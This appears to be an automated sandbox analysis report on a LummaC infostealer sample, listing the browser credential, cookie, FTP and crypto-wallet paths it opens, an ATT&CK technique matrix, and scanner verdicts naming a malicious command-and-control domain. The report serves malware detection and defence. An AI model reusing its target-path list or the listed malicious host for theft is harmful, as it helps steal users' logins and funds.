Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2338758204.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RIMz2N1u5y.exe PID: 4040, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RIMz2N1u5y.exe PID: 4040, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RIMz2N1u5y.exe	44%	Virustotal		Browse
RIMz2N1u5y.exe	61%	ReversingLabs	Win32.Exploit.LummaC

Source	Detection	Scanner	Label
https://erectystickj.click/apiPr39	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclBase.pas	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclRegistry.	0%	Avira URL Cloud	safe
https://erectystickj.click/1E	100%	Avira URL Cloud	malware
https://erectystickj.click/apiY	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclMime.pas	0%	Avira URL Cloud	safe
https://erectystickj.click/QE	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclShell.pas	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclUnitVersio	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclResources.	0%	Avira URL Cloud	safe
https://erectystickj.click/apiNGI	100%	Avira URL Cloud	malware
https://erectystickj.click/	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclWin32.pas	0%	Avira URL Cloud	safe
https://erectystickj.click/QD	100%	Avira URL Cloud	malware
https://erectystickj.click	100%	Avira URL Cloud	malware
https://erectystickj.click/apidb	100%	Avira URL Cloud	malware
https://erectystickj.click/apiWine9	100%	Avira URL Cloud	malware
http://www.giantmatrix.com/sp/getdip.php	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSysInfo.pa	0%	Avira URL Cloud	safe
https://erectystickj.click/apiL	100%	Avira URL Cloud	malware
https://erectystickj.click:443/api	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSysUtils.p	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/Jcl8087.pas	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclWideString	0%	Avira URL Cloud	safe
https://erectystickj.click/api1wq#	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclRTTI.pas	0%	Avira URL Cloud	safe
